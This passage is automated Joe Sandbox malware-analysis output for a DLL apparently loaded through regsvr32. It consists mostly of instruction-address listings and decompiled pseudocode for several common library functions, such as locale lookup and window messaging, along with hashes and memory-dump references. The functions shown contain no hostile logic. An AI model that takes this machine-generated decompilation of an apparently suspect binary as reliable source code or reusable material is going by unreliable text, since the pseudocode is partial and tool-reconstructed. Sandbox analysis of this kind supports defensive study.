                                                                              0x10046483
                                                                              0x10046487
                                                                              0x1004648b
                                                                              0x1004648f
                                                                              0x10046493
                                                                              0x10046497
                                                                              0x1004649b
                                                                              0x1004649e
                                                                              0x100464a6
                                                                              0x100464aa
                                                                              0x100464b0
                                                                              0x100464b3
                                                                              0x100464b9
                                                                              0x100464bc
                                                                              0x100464bf
                                                                              0x100464c3
                                                                              0x100464c7
                                                                              0x100464cf
                                                                              0x1004654c
                                                                              0x10046551
                                                                              0x10046554
                                                                              0x10046558
                                                                              0x1004655c
                                                                              0x10046562
                                                                              0x10046567
                                                                              0x00000000
                                                                              0x100464d1
                                                                              0x100464d1
                                                                              0x100464d6
                                                                              0x100464d9
                                                                              0x100464e0
                                                                              0x100464e7
                                                                              0x100464ee
                                                                              0x100464f0
                                                                              0x100464fc
                                                                              0x100464fe
                                                                              0x10046503
                                                                              0x10046503
                                                                              0x100464fc
                                                                              0x10046506
                                                                              0x1004650d
                                                                              0x1004650f
                                                                              0x1004651b
                                                                              0x1004651d
                                                                              0x1004651d
                                                                              0x1004651b
                                                                              0x10046522
                                                                              0x1004652b
                                                                              0x1004656e
                                                                              0x10046576
                                                                              0x1004652d
                                                                              0x1004652d
                                                                              0x10046535
                                                                              0x10046538
                                                                              0x1004653b
                                                                              0x10046541
                                                                              0x10046541
                                                                              0x1004657c
                                                                              0x10046580
                                                                              0x10046586
                                                                              0x100465c1
                                                                              0x100465c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100465c6
                                                                              0x100465c9
                                                                              0x100465cb
                                                                              0x100465ce
                                                                              0x100465d1
                                                                              0x1004660c
                                                                              0x10046612
                                                                              0x1004661b
                                                                              0x10046621
                                                                              0x100466ce
                                                                              0x100466d1
                                                                              0x100466d3
                                                                              0x100466d6
                                                                              0x100466da
                                                                              0x100466e6
                                                                              0x100466e9
                                                                              0x100466f0
                                                                              0x100466f6
                                                                              0x100466f9
                                                                              0x10046705
                                                                              0x1004670d
                                                                              0x1004671b
                                                                              0x1004671b
                                                                              0x1004671b
                                                                              0x10046627
                                                                              0x1004662b
                                                                              0x10046632
                                                                              0x1004662d
                                                                              0x1004662d
                                                                              0x1004662d
                                                                              0x10046637
                                                                              0x1004663c
                                                                              0x10046644
                                                                              0x1004664a
                                                                              0x1004664f
                                                                              0x10046651
                                                                              0x1004666b
                                                                              0x1004666f
                                                                              0x10046671
                                                                              0x10046674
                                                                              0x10046674
                                                                              0x10046674
                                                                              0x10046678
                                                                              0x10046689
                                                                              0x1004668c
                                                                              0x10046693
                                                                              0x1004669a
                                                                              0x1004669d
                                                                              0x100466a2
                                                                              0x100466a5
                                                                              0x100466b1
                                                                              0x100466b3
                                                                              0x100466b6
                                                                              0x100466b8
                                                                              0x100466b8
                                                                              0x100466bc
                                                                              0x10046935
                                                                              0x10046937
                                                                              0x10046937
                                                                              0x10046937
                                                                              0x10046937
                                                                              0x1004693e
                                                                              0x1004693e
                                                                              0x00000000
                                                                              0x10046653
                                                                              0x10046653
                                                                              0x10046656
                                                                              0x10046659
                                                                              0x1004665f
                                                                              0x1004665f
                                                                              0x10046940
                                                                              0x10046978
                                                                              0x10046978
                                                                              0x10046651
                                                                              0x100465d3
                                                                              0x100465d8
                                                                              0x100465db
                                                                              0x100465e2
                                                                              0x100465eb
                                                                              0x100465f1
                                                                              0x100465f6
                                                                              0x100465f9
                                                                              0x100465fb
                                                                              0x100465fb
                                                                              0x100465fb
                                                                              0x100465fb
                                                                              0x10046602
                                                                              0x00000000
                                                                              0x10046602
                                                                              0x10046588
                                                                              0x10046588
                                                                              0x1004658d
                                                                              0x10046590
                                                                              0x10046597
                                                                              0x100465a0
                                                                              0x100465a6
                                                                              0x100465ae
                                                                              0x100465b0
                                                                              0x100465b0
                                                                              0x100465b7
                                                                              0x00000000
                                                                              0x100465b7

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastValue$CurrentThread
                                                                              • String ID: gfffffff
                                                                              • API String ID: 526964173-1523873471
                                                                              • Opcode ID: 376860f7fd7d15984deb0c4db3e65a2ff9bd7fd6379fc5c2b52f8ad222c373d8
                                                                              • Instruction ID: c4178fd331053a84c50da6eb9b6604ec2d918eff50d401a2f45ac639fe909cd4
                                                                              • Opcode Fuzzy Hash: 376860f7fd7d15984deb0c4db3e65a2ff9bd7fd6379fc5c2b52f8ad222c373d8
                                                                              • Instruction Fuzzy Hash: BAD1FDB2B09BC1C6E715CB29AA5035E77A1E7597C0F24823ACF8887789EB3DD454C706
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100398D0 Relevance: 1.6, APIs: 1, Instructions: 77COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E100398D0(void* __edi, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, long long* __r9, long long __r12, long long __r13, long long __r14, long long __r15, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				char _v56;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				intOrPtr* _t49;
				long long _t53;
				void* _t56;
				intOrPtr* _t65;
				signed long long _t67;
				signed long long _t69;
				long long _t71;
				void* _t72;
				long long* _t77;
				void* _t80;
				void* _t85;
				void* _t88;
				intOrPtr* _t91;

				_t77 = __r9;
				_t71 = __rsi;
				_t53 = __rbx;
				_t49 = __rax;
				_t39 = __edi;
				_a16 = __rbp;
				_a32 = __rdi;
				_t69 =  *((intOrPtr*)(__r8 + 0xc));
				_v8 = __r12;
				_v16 = __r13;
				_v24 = __r14;
				_v32 = __r15;
				_t91 = __rcx;
				_t82 = __r9;
				_t88 = __r8;
				_t85 = __rdx;
				_t37 = E1003E910(__rax, __rbx, __r8, __rdx, _t69, __rsi, __rbp, __r9);
				 *__r9 =  *__rcx;
				_t40 = _t37;
				if(_t39 != 0) {
					_a24 = _t71;
					_a8 = _t53;
					_t72 = (_t69 + _t69 * 4) * 4 - 0x14;
					do {
						_t56 =  *((intOrPtr*)(_t88 + 0x10)) +  *((intOrPtr*)(_t85 + 8)) + _t72;
						if(_t40 <=  *((intOrPtr*)(_t56 + 4)) || _t40 >  *((intOrPtr*)(_t56 + 8))) {
							goto L9;
						} else {
							_t67 =  &_v56;
							r8d = 0;
							L10052DC2();
							r8d =  *((intOrPtr*)(_t56 + 0xc));
							_t80 =  *((intOrPtr*)(_t56 + 0x10)) + _v56;
							r9d =  *_t49;
							_t38 = 0;
							if(r8d != 0) {
								_t65 = _t80 + 0xc;
								while(1) {
									_t49 =  *_t65;
									if(_t49 == _t77) {
										goto L8;
									}
									_t38 = _t38 + 1;
									_t65 = _t65 + 0x14;
									if(_t38 < r8d) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							if(_t38 < r8d) {
								 *_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t80 + 0x10 + (_t67 + _t67 * 4) * 4)) +  *_t91));
							} else {
								goto L9;
							}
						}
						L12:
						goto L13;
						L9:
						_t72 = _t72 - 0x14;
						_t39 = _t39 + 0xffffffff;
					} while (_t39 != 0);
					goto L12;
				}
				L13:
				return _t37;
			}

























                                                                              0x100398d0
                                                                              0x100398d0
                                                                              0x100398d0
                                                                              0x100398d0
                                                                              0x100398d0
                                                                              0x100398d4
                                                                              0x100398d9
                                                                              0x100398de
                                                                              0x100398e2
                                                                              0x100398e7
                                                                              0x100398ec
                                                                              0x100398f1
                                                                              0x100398f6
                                                                              0x100398fc
                                                                              0x100398ff
                                                                              0x10039902
                                                                              0x10039905
                                                                              0x1003990f
                                                                              0x10039913
                                                                              0x10039915
                                                                              0x1003991b
                                                                              0x10039924
                                                                              0x10039929
                                                                              0x10039940
                                                                              0x10039948
                                                                              0x1003994e
                                                                              0x00000000
                                                                              0x10039955
                                                                              0x10039959
                                                                              0x1003995e
                                                                              0x10039961
                                                                              0x1003996a
                                                                              0x1003996e
                                                                              0x10039973
                                                                              0x10039976
                                                                              0x1003997b
                                                                              0x1003997d
                                                                              0x10039981
                                                                              0x10039981
                                                                              0x10039987
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10039989
                                                                              0x1003998c
                                                                              0x10039993
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10039993
                                                                              0x10039981
                                                                              0x10039995
                                                                              0x10039998
                                                                              0x100399b5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10039998
                                                                              0x100399b9
                                                                              0x00000000
                                                                              0x1003999a
                                                                              0x1003999a
                                                                              0x1003999e
                                                                              0x1003999e
                                                                              0x00000000
                                                                              0x100399a3
                                                                              0x100399c6
                                                                              0x100399e8

                                                                              APIs
                                                                              • RtlLookupFunctionEntry.KERNEL32 ref: 10039961
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: EntryFunctionLookup
                                                                              • String ID:
                                                                              • API String ID: 3852435196-0
                                                                              • Opcode ID: 59769eaa68e229c76db50c8400710d59f4f490c79e1e08d4588a0c76d4070464
                                                                              • Instruction ID: 3c696b66b95f97afd51feef29e1c485827ca81908cb9bf73438bd8f47b4d4546
                                                                              • Opcode Fuzzy Hash: 59769eaa68e229c76db50c8400710d59f4f490c79e1e08d4588a0c76d4070464
                                                                              • Instruction Fuzzy Hash: 44314636704B94C6CB11CF1AE48461EB765F78AB95B66810AEF9D47B18DB39D411CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002BF8C Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 10016020: GetWindowLongW.USER32 ref: 10016037
                                                                              • SendMessageW.USER32 ref: 1002C040
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: LongMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 3360111000-0
                                                                              • Opcode ID: 1be22ac559553ce9eddcfb4ab32ebc0fdb5cd974d41509c06fe074201d7b243d
                                                                              • Instruction ID: b9070e2c55865ae9ca18754c9ed512e42d76b31a7febbf7bab62792942e9c924
                                                                              • Opcode Fuzzy Hash: 1be22ac559553ce9eddcfb4ab32ebc0fdb5cd974d41509c06fe074201d7b243d
                                                                              • Instruction Fuzzy Hash: F7112762B1414046F745C676FD26F9E2642DBCD7D4F858114EE460BFC6CB3D8582CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100506C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E100506C0(void* __r9) {
				signed int _v16;
				char _v18;
				char _v24;
				signed int _t12;
				signed long long _t16;
				void* _t23;
				signed long long _t24;

				_t16 =  *0x1006f4c8; // 0x6f13091946cb
				_v16 = _t16 ^ _t24;
				r9d = 6;
				_v18 = 0;
				if(GetLocaleInfoA(??, ??, ??, ??) != 0) {
					E10038FB0( &_v24, _t23);
					return E10038D20(_t12, _v16 ^ _t24);
				} else {
					return E10038D20(_t12, _v16 ^ _t24);
				}
			}










                                                                              0x100506c4
                                                                              0x100506ce
                                                                              0x100506d8
                                                                              0x100506e3
                                                                              0x100506f0
                                                                              0x1005070e
                                                                              0x10050724
                                                                              0x100506f2
                                                                              0x10050708
                                                                              0x10050708

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: c171e177fbd509932e97e1627238f9ad9062ae8a63a102cbe2a8ff0f915a828f
                                                                              • Instruction ID: 6b3ed7fdf40792efe7c0c98ff0f28efa2efd0d5229e471bc5a2a028bccdbf489
                                                                              • Opcode Fuzzy Hash: c171e177fbd509932e97e1627238f9ad9062ae8a63a102cbe2a8ff0f915a828f
                                                                              • Instruction Fuzzy Hash: C5F0A76570868086E722D720F41238B7751E7DC758FC00206EA8C4B7A4DD2CD345CF00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10036B50 Relevance: 1.5, Strings: 1, Instructions: 267COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 59%
                                                                              			E10036B50(void* __esi, void* __rcx, signed long long __rdx, signed int __r8, signed long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r13;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t83;
				signed int _t84;
				void* _t93;
				void* _t94;
				void* _t100;
				signed int _t101;
				intOrPtr _t125;
				void* _t127;
				void* _t139;
				void* _t151;
				void* _t153;
				signed long long _t174;
				signed long long _t175;
				signed long long _t176;
				void* _t177;
				intOrPtr* _t178;
				intOrPtr _t179;
				signed long long _t180;
				signed short* _t181;
				intOrPtr _t182;
				signed long long _t187;
				long long _t188;
				signed long long _t193;
				intOrPtr* _t224;
				intOrPtr* _t226;
				intOrPtr* _t228;
				intOrPtr* _t230;
				void* _t232;
				long long _t233;
				signed int _t235;
				intOrPtr _t236;
				void* _t237;
				signed int _t238;
				signed long long _t239;
				void* _t243;
				void* _t244;
				signed long long _t245;
				signed long long _t246;
				intOrPtr* _t247;
				signed long long _t248;
				intOrPtr* _t249;
				void* _t250;

				_t243 = __r10;
				_t242 = __r9;
				_t240 = __r8;
				_t221 = __rdx;
				_t151 = __esi;
				 *((long long*)(_t239 + 0x60)) = 0xfffffffe;
				_t174 =  *0x1006f4c8; // 0x6f13091946cb
				_t175 = _t174 ^ _t239;
				 *(_t239 + 0x400) = _t175;
				r13d = r9d;
				_t125 = r8d;
				_t249 = __rdx;
				_t237 = __rcx;
				_t235 =  *((intOrPtr*)(_t239 + 0x478));
				 *((intOrPtr*)(_t239 + 0x38)) = 0;
				 *((long long*)(_t239 + 0x30)) = 0;
				 *((long long*)(_t239 + 0x28)) = 0;
				 *((intOrPtr*)(_t239 + 0x20)) = 6;
				r9d = 0;
				r8d = 0;
				_t146 =  *((intOrPtr*)(_t239 + 0x470));
				_t190 = _t239 + 0x70;
				E10029130(E100384E0(_t125, _t127,  *((intOrPtr*)(_t239 + 0x470)), _t153, _t239 + 0x70, __rdx, __r8, __r9, _t244));
				_t245 = _t175;
				if((0 | _t175 != 0x00000000) == 0) {
					E10009538(0x80004005, _t146, _t175, _t187, _t190, __rdx, _t232, __r8, __r9, _t245);
					asm("int3");
				}
				_t176 =  *_t175;
				 *((intOrPtr*)(_t176 + 0x18))();
				_t13 = _t176 + 0x18; // 0x18
				_t233 = _t13;
				 *((long long*)(_t239 + 0x48)) = _t233;
				_t78 = E10028FE0(_t176);
				if(_t176 != 0) {
					r8d = _t125;
					_t221 = _t176;
					_t78 = E10009BA4(_t176, _t239 + 0x48, _t176, _t240, _t245);
					_t233 =  *((intOrPtr*)(_t239 + 0x48));
				}
				_t192 = _t239 + 0x70;
				_t79 = E10037EFC(_t78, _t239 + 0x70);
				 *(_t176 + 0x60) =  *(_t176 + 0x60) | r13d;
				E10029130(_t79);
				_t246 = _t176;
				if((0 | _t176 != 0x00000000) == 0) {
					E10009538(0x80004005, _t146, _t176, _t187, _t192, _t221, _t233, _t240, _t242, _t246);
					asm("int3");
				}
				_t177 =  *_t176;
				_t193 = _t246;
				_t81 =  *((intOrPtr*)(_t177 + 0x18))();
				_t178 = _t177 + 0x18;
				 *((long long*)(_t239 + 0x40)) = _t178;
				E10029130(_t81);
				_t247 = _t178;
				if((0 | _t178 != 0x00000000) == 0) {
					E10009538(0x80004005, _t146, _t178, _t187, _t193, _t221, _t233, _t240, _t242, _t247);
					asm("int3");
				}
				_t179 =  *_t178;
				_t194 = _t247;
				_t83 =  *(_t179 + 0x18)();
				_t180 = _t179 + 0x18;
				 *(_t239 + 0x50) = _t180;
				if(_t235 == 0) {
					_t238 =  *((intOrPtr*)(_t237 + 0x10));
					_t84 = 1;
					__eflags = _t238;
					if(_t238 != 0) {
						while(1) {
							_t235 = _t238;
							__eflags = _t238;
							if(_t238 == 0) {
								break;
							}
							_t238 =  *_t238;
							_t235 =  *((intOrPtr*)(_t235 + 0x10));
							asm("dec eax");
							_t180 = _t239 + 0x50;
							_t187 = _t187 & _t180;
							E10037EFC( ~_t84, _t239 + 0x70);
							_t221 = _t180;
							_t242 = _t187;
							_t240 = _t235;
							_t194 = _t239 + 0x40;
							E10036858(_t125, _t146, _t151, _t180, _t239 + 0x40, _t180, _t235, _t187, _t243, _t249);
							_t84 = 0;
							__eflags = _t238;
							if(_t238 != 0) {
								continue;
							} else {
							}
							goto L15;
						}
						_t84 = E10016544();
						asm("int3");
					}
				} else {
					E10037EFC(_t83, _t239 + 0x70);
					_t221 = _t180;
					_t242 = _t239 + 0x50;
					_t240 = _t235;
					_t194 = _t239 + 0x40;
					_t84 = E10036858(_t125, _t146, _t151, _t180, _t239 + 0x40, _t180, _t235, _t239 + 0x50, _t243, _t249);
				}
				L15:
				E10029130(_t84);
				_t248 = _t180;
				if((0 | _t180 != 0x00000000) == 0) {
					E10009538(0x80004005, _t146, _t180, _t187, _t194, _t221, _t233, _t240, _t242, _t248);
					asm("int3");
				}
				_t181 =  *_t180;
				 *((intOrPtr*)(_t181 + 0x18))();
				_t39 = _t181 + 0x18; // 0x18
				_t188 = _t39;
				 *((long long*)(_t239 + 0x58)) = _t188;
				E10028FE0(_t181);
				if(_t181 != 0) {
					r8d = 0xf002;
					E10009BA4(_t181, _t239 + 0x58, _t181, _t240, _t248);
					_t188 =  *((intOrPtr*)(_t239 + 0x58));
				}
				r8d =  *((intOrPtr*)(_t188 - 0x10));
				E1000B5C0(_t239 + 0x40, _t188, _t233, _t235, _t240, _t248, _t249, _t250);
				r8d = E10039820(E10013150(0, _t239 + 0x40, _t188, _t235, _t240, _t242, _t248), 0x1005d188);
				E1000B5C0(_t239 + 0x40, 0x1005d188, _t233, _t235, _t240, _t248, _t249, _t250);
				_t93 = E10037EFC(E10013150(0, _t239 + 0x40, 0x1005d188, _t235, _t240, _t242, _t248), _t239 + 0x70);
				 *((intOrPtr*)(_t181 + 0x28)) =  *((intOrPtr*)(_t181 + 0x28)) + 1;
				_t94 = E10037EFC(_t93, _t239 + 0x70);
				 *((long long*)(_t181 + 0x18)) =  *((intOrPtr*)(_t239 + 0x40));
				E10037EFC(_t94, _t239 + 0x70);
				 *((long long*)(_t181 + 0x58)) = _t233;
				_t182 =  *_t249;
				_t139 = 1 -  *((intOrPtr*)(_t182 - 8));
				_t98 =  *((intOrPtr*)(_t182 - 0xc)) - 0x00000104 | 0x00000001;
				if(( *((intOrPtr*)(_t182 - 0xc)) - 0x00000104 | 0x00000001) < 0) {
					_t98 = E10009920(0x104, _t249, _t233, _t240);
				}
				_t234 =  *_t249;
				E10037EFC(_t98, _t239 + 0x70);
				 *((long long*)(_t182 + 0x30)) =  *_t249;
				_t100 = E10038308(_t125, _t139, 0xf002, _t182, _t239 + 0x70, 0x1005d188, _t240, _t248);
				_t236 = _t182;
				_t207 =  *_t249;
				if( *_t249 != 0) {
					_t101 = E10039820(_t100, _t207);
					__eflags = _t101;
					if(_t101 < 0) {
						goto L34;
					} else {
						goto L24;
					}
				} else {
					_t101 = 0;
					L24:
					_t207 =  *_t249;
					if(_t101 >  *((intOrPtr*)(_t207 - 0xc))) {
						L34:
						_t140 = 0x80070057;
						E10009538(0x80070057, 0x104, _t182, _t188, _t207, 0x1005d188, _t234, _t240, _t242, _t248);
					} else {
						 *(_t207 - 0x10) = _t101;
						 *((short*)( *_t249 + _t101 * 2)) = 0;
						dil = _t236 == 1;
						_t65 = _t188 - 0x18; // 0x0
						_t224 = _t65;
						asm("lock xadd [edx+0x10], eax");
						if(0x1fffffffe <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t224)) + 8))();
						}
						_t226 =  *(_t239 + 0x50) + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(0x1fffffffe <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t226)) + 8))();
						}
						_t228 =  *((intOrPtr*)(_t239 + 0x40)) + 0xffffffe8;
						asm("lock xadd [edx+0x10], eax");
						if(0x1fffffffe <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t228)) + 8))();
						}
						_t230 =  *((intOrPtr*)(_t239 + 0x48)) + 0xffffffe8;
						asm("lock xadd [edx+0x10], ecx");
						_t140 = 0x1fffffffe;
						if(0x1fffffffe <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t230)) + 8))();
						}
						E10038464(0x104, 0xf002, _t239 + 0x70, _t242, _t248);
					}
				}
				return E10038D20(_t140,  *(_t239 + 0x400) ^ _t239);
			}






















































                                                                              0x10036b50
                                                                              0x10036b50
                                                                              0x10036b50
                                                                              0x10036b50
                                                                              0x10036b50
                                                                              0x10036b60
                                                                              0x10036b69
                                                                              0x10036b70
                                                                              0x10036b73
                                                                              0x10036b7b
                                                                              0x10036b7e
                                                                              0x10036b81
                                                                              0x10036b84
                                                                              0x10036b87
                                                                              0x10036b8f
                                                                              0x10036b97
                                                                              0x10036ba0
                                                                              0x10036ba9
                                                                              0x10036bb1
                                                                              0x10036bb4
                                                                              0x10036bb7
                                                                              0x10036bbe
                                                                              0x10036bc9
                                                                              0x10036bce
                                                                              0x10036bdb
                                                                              0x10036be2
                                                                              0x10036be7
                                                                              0x10036be7
                                                                              0x10036be8
                                                                              0x10036bee
                                                                              0x10036bf1
                                                                              0x10036bf1
                                                                              0x10036bf5
                                                                              0x10036bfc
                                                                              0x10036c04
                                                                              0x10036c06
                                                                              0x10036c09
                                                                              0x10036c11
                                                                              0x10036c16
                                                                              0x10036c16
                                                                              0x10036c1b
                                                                              0x10036c20
                                                                              0x10036c25
                                                                              0x10036c29
                                                                              0x10036c2e
                                                                              0x10036c3b
                                                                              0x10036c42
                                                                              0x10036c47
                                                                              0x10036c47
                                                                              0x10036c48
                                                                              0x10036c4b
                                                                              0x10036c4e
                                                                              0x10036c51
                                                                              0x10036c55
                                                                              0x10036c5a
                                                                              0x10036c5f
                                                                              0x10036c6c
                                                                              0x10036c73
                                                                              0x10036c78
                                                                              0x10036c78
                                                                              0x10036c79
                                                                              0x10036c7c
                                                                              0x10036c7f
                                                                              0x10036c82
                                                                              0x10036c86
                                                                              0x10036c8e
                                                                              0x10036cb1
                                                                              0x10036cb5
                                                                              0x10036cba
                                                                              0x10036cbd
                                                                              0x10036cbf
                                                                              0x10036cbf
                                                                              0x10036cc2
                                                                              0x10036cc5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10036cc7
                                                                              0x10036ccb
                                                                              0x10036cd1
                                                                              0x10036cd4
                                                                              0x10036cd9
                                                                              0x10036ce1
                                                                              0x10036ce6
                                                                              0x10036ce9
                                                                              0x10036cec
                                                                              0x10036cef
                                                                              0x10036cf4
                                                                              0x10036cf9
                                                                              0x10036cfb
                                                                              0x10036cfe
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10036d00
                                                                              0x00000000
                                                                              0x10036cfe
                                                                              0x10036d02
                                                                              0x10036d07
                                                                              0x10036d07
                                                                              0x10036c90
                                                                              0x10036c95
                                                                              0x10036c9a
                                                                              0x10036c9d
                                                                              0x10036ca2
                                                                              0x10036ca5
                                                                              0x10036caa
                                                                              0x10036caa
                                                                              0x10036d08
                                                                              0x10036d08
                                                                              0x10036d0d
                                                                              0x10036d1a
                                                                              0x10036d21
                                                                              0x10036d26
                                                                              0x10036d26
                                                                              0x10036d27
                                                                              0x10036d2d
                                                                              0x10036d30
                                                                              0x10036d30
                                                                              0x10036d34
                                                                              0x10036d40
                                                                              0x10036d48
                                                                              0x10036d4a
                                                                              0x10036d55
                                                                              0x10036d5a
                                                                              0x10036d5a
                                                                              0x10036d5f
                                                                              0x10036d6b
                                                                              0x10036d88
                                                                              0x10036d97
                                                                              0x10036dad
                                                                              0x10036db2
                                                                              0x10036dbb
                                                                              0x10036dc5
                                                                              0x10036dce
                                                                              0x10036dd3
                                                                              0x10036dd7
                                                                              0x10036de0
                                                                              0x10036ded
                                                                              0x10036def
                                                                              0x10036df4
                                                                              0x10036df4
                                                                              0x10036df9
                                                                              0x10036e02
                                                                              0x10036e07
                                                                              0x10036e10
                                                                              0x10036e15
                                                                              0x10036e18
                                                                              0x10036e1f
                                                                              0x10036e25
                                                                              0x10036e2a
                                                                              0x10036e2c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10036e21
                                                                              0x10036e21
                                                                              0x10036e32
                                                                              0x10036e32
                                                                              0x10036e39
                                                                              0x10036ee8
                                                                              0x10036ee8
                                                                              0x10036eed
                                                                              0x10036e3f
                                                                              0x10036e3f
                                                                              0x10036e49
                                                                              0x10036e55
                                                                              0x10036e59
                                                                              0x10036e59
                                                                              0x10036e64
                                                                              0x10036e6d
                                                                              0x10036e75
                                                                              0x10036e75
                                                                              0x10036e7e
                                                                              0x10036e84
                                                                              0x10036e8d
                                                                              0x10036e95
                                                                              0x10036e95
                                                                              0x10036e9e
                                                                              0x10036ea4
                                                                              0x10036ead
                                                                              0x10036eb5
                                                                              0x10036eb5
                                                                              0x10036ebe
                                                                              0x10036ec4
                                                                              0x10036ec9
                                                                              0x10036ecd
                                                                              0x10036ed5
                                                                              0x10036ed5
                                                                              0x10036edf
                                                                              0x10036ee4
                                                                              0x10036e39
                                                                              0x10036f12

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
